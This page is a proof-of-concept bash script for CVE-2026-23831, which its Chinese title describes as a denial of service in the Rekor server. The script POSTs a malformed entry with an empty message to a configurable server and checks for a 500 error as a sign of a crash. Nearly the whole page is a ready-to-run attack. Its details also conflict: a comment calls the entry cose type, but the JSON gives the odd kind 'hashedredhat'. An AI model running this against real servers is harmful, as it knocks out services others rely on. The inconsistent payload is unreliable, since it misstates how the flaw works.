CVE-2026-23831 Rekor空指针解引用拒绝服务漏洞

#!/bin/bash # CVE-2026-23831 PoC - Rekor nil pointer dereference DoS # Target: Rekor server < 1.5.0 # Type: Denial of Service via malformed entry TARGET_URL="${REKOR_SERVER_URL}" # Create a malformed Rekor entry with empty message # This JSON represents a cose/v0.0.1 type entry with empty spec.message MALFORMED_ENTRY='{ "apiVersion": "0.0.1", "kind": "hashedredhat", "spec": { "message": "", "signature": "aabbccdd", "publicKey": "cmVhZG9ubHk=" } }' # Send the malformed entry to trigger panic echo "Sending malformed entry to trigger CVE-2026-23831..." RESPONSE=$(curl -s -w "\n%{http_code}" -X POST \ -H "Content-Type: application/json" \ -d "$MALFORMED_ENTRY" \ "$TARGET_URL/api/v1/addentry") HTTP_CODE=$(echo "$RESPONSE" | tail -n1) BODY=$(echo "$RESPONSE" | sed '$d') echo "HTTP Response Code: $HTTP_CODE" echo "Response Body: $BODY" if [ "$HTTP_CODE" == "500" ]; then echo "[+] Vulnerability confirmed: Server returned 500 error (panic occurred)" else echo "[*] Unexpected response - may indicate patch or different behavior" fi